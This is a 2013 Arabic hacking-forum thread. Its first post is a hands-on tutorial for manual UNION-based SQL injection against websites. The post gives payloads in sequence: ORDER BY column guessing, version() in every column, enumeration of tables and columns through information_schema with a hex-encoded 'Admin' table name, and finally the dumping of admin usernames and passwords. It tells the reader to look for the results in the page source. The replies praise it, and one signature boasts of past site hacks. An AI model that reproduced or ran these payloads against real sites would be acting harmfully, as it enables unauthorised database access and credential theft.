العودة   :: Security امان العرب Arab :: > The real World Of Hacking & Security > [ اختراق المواقـع والسيرفرات ] > [ SQL-injection ]

[ SQL-injection ] [هنا توضع جميع شروح sql injection ]

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 06-18-2013, 06:49 AM   المشاركة رقم: 1
الكاتب
Mr.RaaD
.:: عضو جديد ::.
 
الصورة الرمزية Mr.RaaD
المعلومات  
التسجيل: Jun 2013
العضوية: 182779
المشاركات: 3
بمعدل : 0.00 يوميا
الإتصال Mr.RaaD غير متواجد حالياً


المنتدى  
:: new :: حل مشكلة عدم ظهور المعلومات في الحقن اليدوي - SQL Injection

~ بسم الله الرحمن الرحيم ~

أول موضوع لي في المنتدى , اتمنى ينال اعجابكم مشكلة ظهور المعلومات الحقن اليدوي

الموضوع يتكلم عن مشكلة تواجه الاغلب في الحقن اليدوي !

(* انا لا اعلم اذا كان احد مكتشفها من قبلي , لكن انا اكتشفتها بجهدي الشخصي *)

كود PHP:
+order+by+6-- 
طبعا اكيد نقعد نخمن على عدد الاعمدة , نفرض العدد 6

كود PHP:
+union+select+1,2,3,4,5,6-- 
في اغلب الاحيان لا يظهر العمود المصاب !!

تمام نيجي للتخطي مشكلة ظهور المعلومات الحقن اليدوي


نحنا افترضنا في البداية عدد الاعمدة 6

نضيف الامر لإستعراض اصدار قاعدة البيانات :

كود PHP:
 +union+select+version(),version(),version(),version(),version(),version()-- 
تمام , ضفنا الامر وحملت الصفحة زي قبل !!



نيجي نفتح سورس الصفحة - Page Source مشكلة ظهور المعلومات الحقن اليدوي


نقرا سورس الصفحة وندور , حتى نلاقي الاصدار مشكلة ظهور المعلومات الحقن اليدوي


تمام جبنا الاصدار نفرض

كود PHP:
 5.0.96-community-log 
الان بدنا نستعرض جداول الصفحة !



نستعرض الجداول :

كود PHP:
 +union+select+group_concat(table_****),group_concat(table_****),group_concat(table_****),group_concat(table_****),group_concat(table_****),group_concat(table_****)+from+information_schema.tables+where+table_schema=database()-- 
زي ما عملنا من قبل , نفتح سورس الصفحة - Page Source



طبعا الجداول رح تظهر في نفس المكان يلي ظهرت فيه القاعدة

الان نفرض الجدول :: Admin

نقوم بتشفير الجدول بالهيكس , من خلال الموقع :

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

عشان تتعرف عليه الاوامر

كود PHP:
0x41646d696e 

ما رح اشرح شو لازم تعدلو بالاوامر , معروفة مشكلة ظهور المعلومات الحقن اليدوي


يصبح الامر هكذا :

كود PHP:
 +union+select+group_concat(column_****),group_concat(column_****),group_concat(column_****),group_concat(column_****),group_concat(column_****),group_concat(column_****)+from+information_schema.columns+where+table_****=0x41646d696e 

تمام زي ما عملنا قبل , نستعرض سورس الصفحة - Source Page



الاعمدة تكون موجودة في نفس المكان يلي لقينا فيه اصدار القاعدة والجداول مشكلة ظهور المعلومات الحقن اليدوي



نفرض الاعمدة :: user****,password

نضيف الامر :

كود PHP:
 +union+select+group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password),group_concat(user****,0x3a,password)+from+Admin 
نفتح سورس الصفحة - Page Source


تكون البيانات موجودة في نفس المكان الي استخرجنا منه المعلومات السابقة مشكلة ظهور المعلومات الحقن اليدوي


ومبروك عليك البيانات !!



أعتقد الفكرة وصلت













التعديل الأخير تم بواسطة Mr.RaaD ; 06-18-2013 الساعة 06:20 PM
عرض البوم صور Mr.RaaD   رد مع اقتباس

قديم 06-18-2013, 07:07 AM   المشاركة رقم: 2
الكاتب
Ш A I T I И Ğ
سٌبَحِأُنًڳُ رٌبّيٌ مّأٌأٌعَظُمًڳَ
 
الصورة الرمزية Ш A I T I И Ğ
المعلومات  
التسجيل: Feb 2013
العضوية: 169580
المشاركات: 940
بمعدل : 0.48 يوميا
الإتصال Ш A I T I И Ğ غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

موضوعك يبيله كاسة شاي للتركيز

بارك الله فيك












توقيع : Ш A I T I И Ğ

زينها مع الله تزين
سبحانك ربي مااعظمك
#############
يآ سآدة آلأمر ليس بذلك التعقيد ، هي { 5 } صلوآت في وقتهآ وَ تكون سعيد
#########
حسبنا الله سيؤتينا الله من فضله انا الى الله راغبون
يقول عنه الشيخ ابن باز
والله مادعوت بهذا الدعاء بعد التشهد الاخير في امر عسر الا تيسر
#################
##### اختراقات افتخر فيها#####
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
والقادم باذن الله اكثر
Skype :

اقتباس:
WAIITIING
عرض البوم صور Ш A I T I И Ğ   رد مع اقتباس

قديم 06-18-2013, 02:46 PM   المشاركة رقم: 3
الكاتب
عبد الصمد
.:: عضو نشيط ::.
 
الصورة الرمزية عبد الصمد
المعلومات  
التسجيل: Feb 2010
العضوية: 48534
المشاركات: 420
بمعدل : 0.14 يوميا
الإتصال عبد الصمد غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

باراك الله فيك
واحي فيك جهدك والاتكال على نفسك
جميل جا واصل












توقيع : عبد الصمد

vbspiders/v4-team

عرض البوم صور عبد الصمد   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
مشاكل, حلول, sql injection


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
طلب شرح الحقن اليدوي كامل CrSmS [ مشاكل وحلول اختراق المواقع ] 4 05-07-2013 02:46 PM
اوامر الحقن اليدوي libyan boy [ SQL-injection ] 6 02-06-2013 07:15 PM
نقأشش .. الحقن الالي +الحقن اليدوي=مميزات عيوب .. لخبراء الحقن sql وهوـوب القصيم [ SQL-injection ] 32 01-23-2012 10:00 PM
مشكلة عند رفع شل في الوورد بريس ظهور الصفحة البيضاء mr.nawaf [ مشاكل وحلول اختراق المواقع ] 7 01-17-2012 07:41 AM
تخطي مشكلة الفلتر عند محاولة الحقن بثغرات SQL Injection PrO SpY [ SQL-injection ] 37 01-05-2009 02:53 PM


الساعة الآن 03:16 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.